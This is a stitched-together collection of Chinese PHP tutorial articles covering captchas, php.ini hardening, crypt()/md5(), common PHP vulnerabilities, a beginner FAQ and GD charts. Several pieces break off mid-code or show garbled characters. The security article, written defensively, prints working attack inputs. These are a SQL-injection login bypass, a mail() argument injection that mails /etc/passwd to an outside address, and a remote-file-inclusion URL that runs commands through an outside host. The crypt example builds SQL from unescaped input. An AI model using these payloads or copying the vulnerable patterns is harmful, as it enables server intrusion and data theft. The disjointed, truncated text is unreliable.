PHP入门

我们这里展示了如何编写PHP程序实现验证码功能：
牐牬码一：

牐牬码二：

PHP文件的源码都是明文，这对于某些商业用途来说，并不适合。因此考虑使用加密的手段保护源码。实在不耐烦等待zend出编译器，而且编译和加密本质上不是一回事儿。自己动手、开始修改。

在很长一段时间内，PHP作为服务器端脚本语言的最大卖点之一就是会为从表单提交的值自动建立一个全局变量。在PHP 4.1中，PHP的制作者们推荐了一个访问提交数据的替代手段。在PHP 4.2中，他们取消了那种老的做法！正如我将在这篇文章中解释的那样，作出这样的变化的目的是出于安全性的考虑。我们将研究PHP在处理表单提交及其它数据时的新的做法，并说明为什么这样做会提高代码的安全性。

这里有什么错误？

很早就想写这篇文章了，但一直没有时间完成它。不是说我来告诉大家如何做，我更希望本文只是做为一个引子，与大家来讨论关于如何建立一个有效地、灵活的网络应用程序。
经过了2－3年的网络应用程序开发工作，我的开发经验变得更加生动了，回过头来看我以前为Geocrawler写的代码，简直不敢相信这是我的。由于GPL的原因，在PHPBuilder中的源码也是良莠不齐的。
最近我做为一个有经验的PHP开发者，一直在帮着写SourceForge，我想这显示出了最终结果的一个范围。好的代码应被分成了多个部分，合适的库及函数调用，清楚的数据库结构，站点的每一个部分与其它部分都是相对独立的。
但是，这仍不是最好的。如果我可以重做，我将更多的关注于HTML层与数据层的分离，通过对象及清楚的函数库实现这一点。
优美的图形
我知道经理们喜欢用优美的图形及图表来描述它们，这将给我们留下最好的印象。用这种隐藏在一个结构后的想法，你可以把你的逻辑与外观分离，这意味着任何一个复杂的程序都可以用API/Data Access Layer来表述。
与其你把安全检测、更新的句子等放在HTML层中，不如把它们整体地放在你的API层里。而这个HTML层只含有简单的函数调用和返回的数组、对象或自定的其它什么，以及一些数据库的检索结果的集合等。
如果你这样做了，顶层将是非常的瘦小，你可以方便地创建及维护它。
如下的例子中，这个HTML接口中只有一些API层中的函数的直接调用，一些HTML工具库（它能生成一个弹出框等等），和一些从数据库抽象层中调用的数据库操作方法（你不需要绑定某一个特别的数据库）。
基础
灵活的PHP程序结构最基本的方面有以下几点：
数据库无关性
界面无关性
可移植性
面向对象或至少应由函数库组成
还有其它的？
当然还有一些其它的东西，但我认为那都是太大了，或许你自己能指出它们。

这篇文章我们来通过对php的一些服务器端特性来进行配置加强php的安全。写cgi脚本的时候我们的确一定注意各种安全问题，对用户输入进行严格的过滤，但是常在岸边走哪有不湿鞋，吃烧饼哪有不掉芝麻，人有失蹄马有失手，连著名的phpnuke、phpMyAdmin等程序都出现过很严重的问题，更何况象我等小混混写的脚本。所以现在我们假设php脚本已经出现严重问题，比如象前一阵子 phpnuke的可以上传php脚本的大问题了，我们如何通过对服务器的配置使脚本出现如此问题也不能突破系统。
1、编译的时候注意补上已知的漏洞
从4.0.5开始，php的mail函数加入了第五个参数，但它没有好好过滤，使得php应用程序能突破safe_mode的限制而去执行命令。所以使用4.0.5和4.0.6的时候在编译前我们需要修改php源码包里ext/standard/mail.c文件，禁止mail函数的第五参数或过滤shell字符。在mail.c文件的第152行，也就是下面这行：
if (extra_cmd != NULL) {
后面加上extra_cmd=NULL;或extra_cmd = php_escape_shell_cmd(extra_cmd);然后编译php那么我们就修补了这个漏洞。
2、修改php.ini配置文件
以php发行版的php.ini-dist为蓝本进行修改。
1)Error handling and logging
在Error handling and logging部分可以做一些设定。先找到：
display_errors = On
php缺省是打开错误信息显示的，我们把它改为：
display_errors = Off
关闭错误显示后，php函数执行错误的信息将不会再显示给用户，这样能在一定程度上防止攻击者从错误信息得知脚本的物理位置，以及一些其它有用的信息，起码给攻击者的黑箱检测造成一定的障碍。这些错误信息可能对我们自己有用，可以让它写到指定文件中去，那么修改以下：
log_errors = Off
改为：
log_errors = On
以及指定文件，找到下面这行：
;error_log = filename
去掉前面的;注释，把filename改为指定文件，如/usr/local/apache/logs/php_error.log
error_log = /usr/local/apache/logs/php_error.log
这样所有的错误都会写到php_error.log文件里。
2)Safe Mode
php的safe_mode功能对很多函数进行了限制或禁用了，能在很大程度解决php的安全问题。在Safe Mode部分找到：
safe_mode = Off
改为：
safe_mode = On
这样就打开了safe_mode功能。象一些能执行系统命令的函数shell_exec()和``被禁止，其它的一些执行函数如：exec(), system(), passthru(), popen()将被限制只能执行safe_mode_exec_dir指定目录下的程序。如果你实在是要执行一些命令或程序，找到以下：
safe_mode_exec_dir =
指定要执行的程序的路径，如：
safe_mode_exec_dir = /usr/local/php/exec
然后把要用的程序拷到/usr/local/php/exec目录下，这样，象上面的被限制的函数还能执行该目录里的程序。
关于安全模式下受限函数的详细信息请查看php主站的说明：
http://www.php.net/manual/en/features.safe-mode.php
3)disable_functions
如果你对一些函数的危害性不太清楚，而且也没有使用，索性把这些函数禁止了。找到下面这行：
disable_functions =
在”=“后面加上要禁止的函数，多个函数用”,“隔开。
3、修改httpd.conf
如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行：

数据加密在我们生活中的地位已经越来越重要了，尤其是考虑到在网络上发生的大量 交易和传输的大量数据。如果对于采用安全措施有兴趣的话，也一定会有兴趣了解PHP提供的一系列安全功能。在本篇文章中，我们将介绍这些 功能，提供一些基本的用法，以便你能够为自己的应用软件中增加安全功能。
预备知识
在详细介绍PHP的安全功能之 前，我们需要花点时间来向没有接触过这方面内容的读者介绍一些有关密码学的基本知识，如果对密码学的基本概念已经非常熟悉，就可以跳 过去这一部分。
密码学可以通俗地被描述为对加/解密的研究和实验，加密是将易懂的资料转换为不易懂资料的过程，解密 则是将不易懂的资料转换为原来易懂资料的过程。不易懂的资料被称作密码，易懂的资料被称作明码。
数据的加/解密都需 要一定的算法，这些算法可以非常地简单，如著名的凯撒码，但当前的加密算法要相对复杂得多，其中一些利用现有的方法甚至是无法破译的 。
PHP的加密功能
只要有一点使用非Windows平台经验的人可能对crypt()也相当熟悉，这一函数完成被称作单向加密 的功能，它可以加密一些明码，但不能够将密码转换为原来的明码。尽管从表面上来看这似乎是一个没有什么用处的功能，但它的确被广泛用 来保证系统密码的完整性。因为，单向加密的口令一旦落入第三方人的手里，由于不能被还原为明文，因此也没有什么大用处。在验证用户输 入的口令时，用户的输入采用的也是单向算法，如果输入与存储的经加密后的口令相匹配，则输入的口信一定是正确的。
PHP同样提供了使用其crypt()函数完成单向加密功能的可能性。我将在这里简要地介绍该函数：
string crypt (string input_string [, string salt])
其中的input_string参数是需要加密的字符串，第二个可选的salt是一个位字串，它能够影响 加密的暗码，进一步地排除被称作预计算攻击的可能性。缺省情况下，PHP使用一个2个字符的DES干扰串，如果你的系统使用的是MD5（我将在 以后介绍MD5算法），它会使用一个12个字符的干扰串。顺便说一下，可以通过执行下面的命令发现系统将要使用的干扰串的长度：
print "My system salt size is: ". CRYPT_SALT_LENGTH;
系统也可能支持其他的加密算法。crypt()支持四 种算法，下面是它支持的算法和相应的salt参数的长度：
算法 Salt长度
CRYPT_STD_DES 2-character (Default)
CRYPT_EXT_DES 9-character
CRYPT_MD5 12-character beginning with $
CRYPT_BLOWFISH 16-character beginning with $
用crypt()实现用户身份验证
作为crypt()函数的一个例子，考虑这样一种情况，你希望创建一段PHP脚本程序限 制对一个目录的访问，只允许能够提供正确的用户名和口令的用户访问这一目录。我将把资料存储在我喜欢的数据库MySQL的一个表中。下面我 们以创建这个被称作members的表开始我们的例子：
mysql>CREATE TABLE members (
->username CHAR(14) NOT NULL,
->password CHAR(32) NOT NULL,
->PRIMARY KEY(username)
->);
然后，我们假定下面的数据已经存储在该表中：
用户名 密码
clark keloD1C377lKE
bruce ba1T7vnz9AWgk
peter paLUvRWsRLZ4U
这些加密的口令对应的明码分别是kent、banner和parker。注意一下每个口令的前二个字母， 这是因为我使用了下面的代码，根据口令的前二个字母创建干扰串的：
$enteredPassword.
$salt = substr($enteredPassword, 0, 2);
$userPswd = crypt($enteredPassword, $salt);
// $userPswd然后就和用户名一起存储在MySQL 中
我将使用Apache的口令-应答认证配置提示用户输入用户名和口令，一个鲜为人知的有关PHP的信息是，它可以把Apache 的口令-应答系统输入的用户名和口令识别为$PHP_AUTH_USER和$PHP_AUTH_PW，我将在身份验证脚本中用到这二个变量。花一些时间仔细阅读下 面的脚本，多注意一下其中的解释，以便更好地理解下面的代码：
crypt()和Apache的口令-应答验证系统的应用
$host = "localhost";
$user = "zorro";
$pswd = "hell odolly";
$db = "users";
// Set authorization to False
$authorization = 0;
// Verify that user has entered username and password
if (isset($PHP_AUTH_USER) && isset($PHP_AUTH_PW)) :
mysql_pconnect($host, $user, $pswd) or die("Can't connect to MySQL
server!");
mysql_select_db($db) or die("Can't select database!");
// Perform the encryption
$salt = substr($PHP_AUTH_PW, 0, 2);
$encrypted_pswd = crypt($PHP_AUTH_PW, $salt);
// Build the query
$query = "SELECT username FROM members WHERE
username = '$PHP_AUTH_USER' AND
password = '$encrypted_pswd'";
// Execute the query
if (mysql_numrows(mysql_query($query)) == 1) :
$authorization = 1;
endif;
endif;
// confirm authorization
if (! $authorization) :
header('WWW-Authenticate: Basic realm="Private"');
header('HTTP/1.0 401 Unauthorized');
print "You are unauthorized to enter this area.";
exit;
else :
print "This is the secret data!";
endif;
?>
上面就是一个核实用户访问权限的简单身份验证系统。在使用crypt()保护重要的机密资料时，记住在缺省状态下使用的 crypt()并不是最安全的，只能用在对安全性要求较低的系统中，如果需要较高的安全性能，就需要我在本篇文章的后面介绍的算法。
下面我将介绍另一个PHP支持的函数━━md5()，这一函数使用MD5散列算法，它有几种很有趣的用法值得一提：
混编
一个混编函数可以将一个可变长度的信息变换为具有固定长度被混编过的输出，也被称作“信息文摘”。这是十分有用的，因为 一个固定长度的字符串可以用来检查文件的完整性和验证数字签名以及用户身份验证。由于它适合于PHP，PHP内置的md5()混编函数将把一个可 变长度的信息转换为128位（32个字符）的信息文摘。混编的一个有趣的特点是不能通过分析混编后的信息得到原来的明码，因为混编后的结果 与原来的明码内容没有依赖关系。 即便只改变一个字符串中的一个字符，也将使得MD5混编算法计算出二个截然不同的结果。我们首先来看下 表的内容及其相应的结果：
　
使用md5()混编字符串
$msg = "This is some message that I just wrote";
$enc_msg = md5($msg);
print "hash: $enc_msg ";
?>
结果：
hash: 81ea092649ca32b5ba375e81d8f4972c
注意，结果的长度为32个字符。再来看一下下面的表，其中的$msg的值有了一点 微小的变化：
使用md5()对一个稍微变化的字符串进行混编
//注意，message中少了一个s
$msg = "This is some mesage that I just wrote";
$enc_msg = md5($msg);
print "hash2: $enc_msg

";
?>
结果：
hash2: e86cf511bd5490d46d5cd61738c82c0c

前言

PHP被大量的应用于Web的后台CGI开发，通常是在用户数据数据之后得出某种结果，但是如果用户输入的数据不正确，就会出现问题，比如说某人的生日是2月30日！那应该怎么样来检验暑假是否正确呢？ 在PHP中加入了正则表达式的支持，让我们可以十分方便的进行数据匹配。

Shaun Clowes的文章Exploiting Common Vulnerabilities in PHP Applications的确写的很棒，
考虑到了很多方面，我这个文章只是狗尾续貂，补充一些其它没怎么提到的问题。本文侧重于解决问题，而不是
攻击。
1、古老的欺骗SQL语句
在默认模式下，即使是你忘了把php.ini拷到/usr/local/lib/php.ini下，php还是打开magic_quotes_gpc＝on。
这样所有从GET/POST/Cookie来的变量的单引号()、双引号()、反斜杠backslash()以及空字元NUL
(the null byte)都会被加上反斜杠，以使数据库能够正确查询。
但是在php-4-RC2的时候引入了一个配置文件php.ini-optimized，这个优化的php.ini却是
magic_quotes_gpc＝off的。某些网管看到optimized字样也许就会把php.ini-optimized拷到
/usr/local/lib/php.ini，这时就比较危险。象比较简单的验证，假设没有过滤必要的字符：
select * from login where user=$HTTP_POST_VARS[user] and pass=$HTTP_POST_VARS[pass]
我们就可以在用户框和密码框输入1‘ or 1=1通过验证了。这是非常古董的方法了，这个语句会
替换成这样：
select * from login where user=1 or 1=1 and pass=1 or 1=1
因为or 1=1成立，所以通过了。
解决的办法最好就是过滤所有不必要的字符，还有就是推荐对于从GET/POST/Cookie来的并且用在SQL
中的变量加一个自定义的函数：
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
主要是为了你的程序能安全移植在各种系统里。
2、mail函数的第五个参数
在php-4.0.5的时候，mail函数引入了第五个参数，用来设置在实际发送邮件的时候增加额外的命令行参数，
但是没有很好的检查特殊SHELL命令字符，所以出现执行命令的大问题。就像手册里的例子：
mail(nobody@aol.com, the subject, $message, From: webmaster@$SERVER_NAME, -fwebmaster@$SERVERNAME);
这个是存在问题的，如果$SERVER_NAME=;mail san@xfocus.org < /etc/passwd就能把机器的密码发送
到我的信箱了。
这里提醒一下，php手册里还有好几个例子存在安全问题的，大家实际使用的时候不要照搬，它只是演示函数的
基本功能，理解了就可以了。
对于mail函数的这个问题，最简单的我们就不用这个第五个参数，要使用就过滤非法的字符如(;)，还有就是修改
php源码包的程序ext/standard/mail.c，在if (extra_cmd != NULL) { 前增加如下一行：
extra_cmd=NULL
然后重新编译。
3、UNIX版的require, include函数
win版本的require和include函数是不支持HTTP和FTP远程文件包含的，而UNIX版本默认都是支持远程包含文件。
require和include不管你是什么扩展名的，把你包含进来就作为程序的一部分来执行。
我们在写程序的时候为了程序的模块化，以及程序的可移植性，不可避免的用到很多require或include函数，
而且有时用变量作为参数，比如：include($something); 如果这时用户能控制$something参数，而这个
参数又没有过滤，那就惨拉。
首先可以看任何web用户有读权限的文件，假设这个程序叫http://victim/test.php，这样我们就可以用如下
url: http://victim/test.php?something=/etc/passwd 看到/etc/passwd文件。
另外可以利用其远程文件包含的功能执行命令。比如我在www.xfocus.org下建立一个文件test.php，内容是：
，那么我就可以用如下的url:
http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname这种方式运行任
意的命令。
phpMyAdmin也出现了这个问题，我们可以用它看任何我们想看的文件。但是它在include前，先用file_exist
函数判断文件是否存在，而这个file_exist是不支持远程文件的，所以上面第二种办法无法直接使用。但是我们
可以利用apache的日志功能，请求一个带php代码的url，这样，something指定为apache的日志也可以执行命
令了，但是apache的日志通常比较大，有太多杂乱信息。
http://www.securereality.com.au/sradv00008.txt提到的办法比较巧妙，用file upload的方式把本地
的执行命令的脚本上传，会在服务器的文件上传临时目录里产生php8Ta02I之类的文件名，由于这时文件是存在的
，所以能通过file_exist函数，从而执行上传文件里的执行脚本。
所以对于include, require函数的使用一定要小心，特别是以包含的文件以参数指定这种方式，参数绝对不能
让用户来控制。还有通过修改php.ini文件去掉远程文件包含这个功能。这个在php-4.0.3以前用
disable-url-fopen-wrapper 在以后的版本用allow_url_fopen ＝ off来关闭。
4、disable_function
在php-4.0.1，php.ini里引入了一项功能disable_functions , 这个功能比较有用，可以用它禁止一些函数。
比如在php.ini里加上disable_functions = passthru exec system popen 那么在执行这些函数的时候
只会提示Warning: system() has been disabled for security reasons.
唉，但是也不是没有办法执行系统命令了。因为php采用了很多perl的特性，比如还可以用(`)来执行命令：
$output = `ls -al`;
echo

PHP自定义函数只允许用return语句返回一个值，当return执行以后，整个函数的运行就会终止。有时候我们要求函数返回多个值时，用return是不可以把值一个接一个地输出的。但不可忽视的一点是，return语句可以返回任何类型的变量，这就是使自定义函数返回多个值的关键。请看代码：

【1】页面之间无法传递变量 get,post,session在最新的php版本中自动全局变量是关闭的，所以要从上一页面取得提交过来得变量要使用$_GET[foo],$_POST[foo],$_SESSION[foo]来得到 
当然也可以修改自动全局变量为开(php.ini改为register_globals = On)；考虑到兼容性，还是强迫自己熟悉新的写法比较好。 
【2】Win32下apache2 用get方法传递中文参数会出错 
test.php?a=你好&b=你也好 
传递参数是会导致一个内部错误 
解决办法:test.php?a=.urlencode(你好).&b=.urlencode(你也好) 
............. 
【3】win32下的session不能正常工作 
php.ini默认的session.save_path = /tmp 
这显然是linux下的配置，win32下php无法读写session文件导致session无法使用 
把它改成一个绝对路径就可以了，例如session.save_path = c:windowstemp 
【4】显示错误信息 
当php.ini的display_errors = On并且error_reporting = E_ALL时，将显示所有的错误和提示，调试的时候最好打开以便纠错，如果你用以前php写法错误信息多半是关于未定义变量的。变量在赋值以前调用会有提示，解决办法是探测或者屏蔽 
例如显示$foo，可以if(isset($foo)) echo $foo 或者echo @$foo 
【5】Win32下mail()不能发送电子邮件 
在linux下配置好的sendmail可以发送，在win32下需要调用smtp服务器来发送电子邮件 
修改php.ini的SMTP = ip //ip是不带验证功能的smtp服务器(网上很难找到) 
php发送邮件的最好解决方法是用socket直接发送到对方email服务器而不用转发服务器 
【6】初装的mysql如果没有设置密码，应该使用 
update mysql.user set password=yourpassword where user=root 
修改密码 
【7】header already sent 
这个错误通常会在你使用HEADER的时候出现，他可能是几种原因：1，你在使用HEADER前PRING或者ECHO了2.你当前文件前面有空行3.你可能INCLUDE了一个文件,该文件尾部有空行或者输出也会出现这种错误。！ 
【8】更改php.ini后没有变化 
重新启动web server，比如IIS，Apache等等，然后才会应用最新的设置 
【9】php在2003上面安装（ISAPI的安装方法恳请高手指教） 
PHP4的php4isapi.dll好像和2003有些冲突，只能用CGI模式安装 
步骤一，先www.php.net下在一个安装程序，我是装的是：php-4.2.3-installer.exe，你也可以去找最新的版本，在安装php-4.2.3-installer.exe之前保证你的IIS6.0启动了，并能够访问。 安装好以后，在默认网站-->应用程序配置 
步骤二：点击 web服务扩展 -->新建web服务扩展. 
步骤三： 扩展名-->php,然后添加 
步骤四：找到php.exe的路径添加上去。 
步骤五： 确定就可以了！ 
步骤六： 选择php的服务扩展，然后点击允许。 
【10】 
有时候sql语句不起作用，对数据库操作失败 
最简便的调试方法，echo那句sql，看看变量的值能得到不 
【11】include和require的区别 
两者没有太大的区别，如果要包含的文件不存在，include提示notice，然后继续执行下面的语句，require提示致命错误并且退出 
据我测试，win32平台下它们都是先包含后执行，所以被包含文件里最好不要再有include或require语句，这样会造成目录混乱。或许*nux下情况不同，暂时还没测试 
如果一个文件不想被包含多次可以使用include_once或require_once## 读取，写入文档数据 
function r($file_name) { 
$filenum=@fopen($file_name,r); 
@flock($filenum,LOCK_SH); 
$file_data=@fread($filenum,filesize($file_name)); 
@fclose($filenum); 
return $file_data; 
} 
function w($file_name,$data,$method=w){ 
$filenum=@fopen($file_name,$method); 
flock($filenum,LOCK_EX); 
$file_data=fwrite($filenum,$data); 
fclose($filenum); 
return $file_data; 
} 
【12】isset()和empty()的区别 
两者都是测试变量用的 
但是isset()是测试变量是否被赋值，而empty()是测试一个已经被赋值的变量是否为空 
如果一个变量没被赋值就引用在php里是被允许的,但会有notice提示 
如果一个变量被赋空值，$foo=或者$foo=0或者 $foo=false,那么empty($foo)返回真，isset($foo)也返回真，就是说赋空值不会注销一个变量。 
要注销一个变量，可以用 unset($foo)或者$foo=NULL 
【13】mysql查询语句包含有关键字 
php查询mysql的时候，有时候mysql表名或者列名会有关键字 
这时候查询会有错误。例如表名是order,查询时候会出错 
简单的办法是sql语句里表名或者列名加上`[tab键上面]来加以区别 
例如select * from `order` 
【14】通过HTTP协议一次上传多个文件的方法 
有两个思路，是同一个方法的两种实现。具体程序还需自己去设计 
1,在form中设置多个文件输入框，用数组命名他们的名字，如下： 
 
 
 
 
 
这样，在服务器端做以下测试 
echo 

首先我们来看看代码优化。注意，这里的代码优化可不是指把代码写得更加美观漂亮，因为这恐怕已经是 众所周知没有必要继续讨论了；另外，如果你已经考虑到了速度问题，很可能你早就对PHP的源代码作了一些优 化。不过，有些工具却能够自动地帮助我们完成这些繁杂的工作，如Zend Optimizer就是这样一个工具。 Zend Optimizer可以从Zend Technologies免费得到，但你必须同意它的许可约定，注意它不是以 GPL方式发行。Zend Optimizer获取由Zend Engine运行时编译生成的中间代码，并对它进行优化， 从而使得中间代码具有更快的执行效率。

PHP有一个令人惊讶的能力——你可以利用它的服务器端脚本创建动态图形。这项功能的基础是GD库，它是由Thomas Boutell设计的ANSI C库，这个库支持除.GIF文件之外的绝大多数常见图形文件格式（不过该库的设计者许诺当LZW专利在2004年7月7日到期后就立即添加.GIF支持）。
PHP4.3以及它的更高版本集成了GD库。如果你使用的是老版本的PHP，你需要手工安装图形支持。这儿有许多与之有关的信息。
折线图
为了演示如何用PHP创建动态图形，我们建立一些自定义图形。第一个例子是画在网格上的折线图，如图A所示。
图A
500) this.width=500' align='center' hspace='10' vspace='10'>
我们把这个页面叫着grid.php（相关附件：清单A）。为了调用Web页动态产生的图形，你只需要访问这个PHP页，它将该图形传递到浏览器。IMG元素可以很好的完成这项工作。下面是实现这个功能的例子代码：

现在，我们开始编写用于创建图形的代码。下面是grid.php中源代码片断：
//添加图形的值
$graphValues=array(0,80,23,11,190,245,50,80,111,240,55);
首先，我们定义图形的值。在这个例子中，图形值直接写到代码中的一个数组中，不过你可以很容易改写代码，让代码从XML文件、表格或者数据库中获取这些值。这些值的范围从0到250（以象素为单位的图形尺寸）。这些值将决定每个网格上线段的初始象素位置。如果你想使用数值0和100（用百分比表示），你只需把这些值乘以2.5来决定网格上的象素位置。
然后，我们发送一个PNG头并定义图像的高度和宽度：
// Define .PNG image
header("Content-type: image/png");
$imgWidth=250;
$imgHeight=250;
我们发送一个图形头来“欺骗”浏览器，使它认为我们的PHP页面是一幅真正的图像，这样它才可以正确显示在屏幕上。服务器将以二进制数据流的形式把程序产生的信息发送到浏览器。
PNG（Portable Network Graphic，便携式网路图形）标准是一种无损的图形格式，它由于GIF的 LZW算法专利这一法律问题而在1995年提出来的。
现在，我们例化图形对象并定义我们在图形中用到的颜色：
//创建图像、定义颜色
$image=imagecreate($imgWidth, $imgHeight);
$colorWhite=imagecolorallocate($image, 255, 255, 255);
$colorGrey=imagecolorallocate($image, 192, 192, 192);
$colorBlue=imagecolorallocate($image, 0, 0, 255);
我们设置白色背景，灰色画框以及蓝色折线。你可以通过创建新变量并赋不同的RGB值来轻松的修改或者添加颜色。
我们可以用imageline函数来创建灰色画框，每次调用这个函数就画一条线：
//创建图像周围的框
imageline($image, 0, 0, 0, 250, $colorGrey);
imageline($image, 0, 0, 250, 0, $colorGrey);
imageline($image, 249, 0, 249, 249, $colorGrey);
imageline($image, 0, 249, 249, 249, $colorGrey);
这里用到了二维的x/y象素坐标。Imageline函数中的每一对值指定了图像的起点和终点。
为了实现网格线，我们在x坐标轴和y坐标轴上每隔25个象素画一条灰线：
//创建网格
for ($i=1; $i<11; $i++){
imageline($image, $i*25, 0, $i*25, 250, $colorGrey);
imageline($image, 0, $i*25, 250, $i*25, $colorGrey);
}
位置（0,0）表示网格的左上角，位置（250,250）表示右下角。每个坐标轴等分为10格，每格宽度是25个象素，即250个象素（图形的尺寸）。
为了创建折线图，我们只需循环的取出数组中的坐标值，按坐标画出每条线段的起点和终点：
//创建折线图
for ($i=0; $i<10; $i++){
imageline($image, $i*25, (250-$graphValues[$i]), ($i+1)*25, (250-$graphValues[$i+1]), $colorBlue);
}
PHP将会自动在起点和终点之间填充蓝线。在这个简单的例子中只有10个值，但是扩展这个技术非常容易，如创建类似股指示意图那样的复杂图形等等。
最后，我们需要把这个图像输出到浏览器并清空服务器中保存图像的内存空间：
//输出图形并清楚内存中的图像
imagepng($image);
imagedestroy($image);
?>
直方图
把上面用于创建折线图的基本程序修改后用于创建直方图（如图B所示）。
图B
500) this.width=500' align='center' hspace='10' vspace='10'>
（相关附件：清单B）这段程序与我们上面用来画折线图的代码略有不同。Imagefilledrectangle函数创建两种直方块——深色的直方块表示$graphValues数组中保存的值，而浅色直方块则用于填充深色方块之间的空隙：
//创建直方图
for ($i=0; $i<10; $i++){
imagefilledrectangle($image, $i*25, (250-$graphValues[$i]), ($i+1)*25, 250, $colorDarkBlue);
imagefilledrectangle($image, ($i*25)+1, (250-$graphValues[$i])+1, (($i+1)*25)-5, 248, $colorLightBlue);
}
留心CPU的负荷
当你在服务器端创建这些图形时，你需要仔细考虑这个问题：CPU负荷。如果你在Web端有太多这样的动态图片产生任务，你可能会发现导致性能下降。
更复杂的用法
本文所列举的例子仅仅是个起点。如果你想得到有关PHP图形库的更多信息，请查看PHP手册上的的图形函数网页。